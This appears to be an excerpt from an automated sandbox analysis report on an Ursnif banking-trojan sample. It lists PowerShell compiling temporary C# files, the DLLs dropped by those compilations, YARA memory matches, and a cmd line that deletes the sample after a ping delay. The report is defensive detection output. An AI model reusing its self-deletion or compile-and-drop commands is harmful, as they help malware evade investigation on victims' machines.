            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tpt0a0ul.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0hsihch1.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oeprcmty.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pqvogmwc.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pwlcj2cu.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tpt0a0ul.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pwlcj2cu.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ugg3o5nf.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pqvogmwc.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sjfy431f.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0hsihch1.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oyq1c2cj.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oeprcmty.cmdline
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\pqvogmwc.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\ugg3o5nf.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\sjfy431f.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\0hsihch1.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\pwlcj2cu.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\oyq1c2cj.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\tpt0a0ul.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\oeprcmty.dllJump to dropped file

            Hooking and other Techniques for Hiding and Protection

            barindex
            Yara detected Ursnif
            Source: Yara matchFile source: 00000005.00000003.311254885.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.365747529.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.318724371.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000020.00000003.461557697.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.319004486.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000003.463004006.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.313620006.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.318536421.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000020.00000003.461902284.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.318886527.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.310802933.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.419223881.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.318950101.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.318813278.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.357803374.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.416632245.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.360636522.00000000054DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000003.462719900.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.311195582.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.310405280.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.424590800.0000000006248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.310678862.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.419462428.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.313789835.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.416948546.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.357904969.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.310826841.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.311031834.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000003.462876303.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.311387225.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.418907434.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.310564493.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.311048648.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.311384342.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.418190503.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.418488620.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.318621591.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.313081553.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.312190736.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.310688564.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.358039219.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.311319683.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.310571881.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000020.00000003.461973969.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.419037087.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.310907059.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.359673745.0000000001F7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.312479873.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.370947214.000000000540C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.360822217.000000000536C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.416181802.0000000006078000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.319064007.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000003.463098635.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.310393039.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.313276698.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.313441363.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.312864720.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.416179066.00000000064A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000020.00000003.461743717.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.419113309.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6248, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 6100, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4768, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5376, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: control.exe PID: 3360, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: control.exe PID: 3088, type: MEMORYSTR
            Self deletion via cmd delete
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\61f113091fd0c.dll
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\61f113091fd0c.dll
            Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
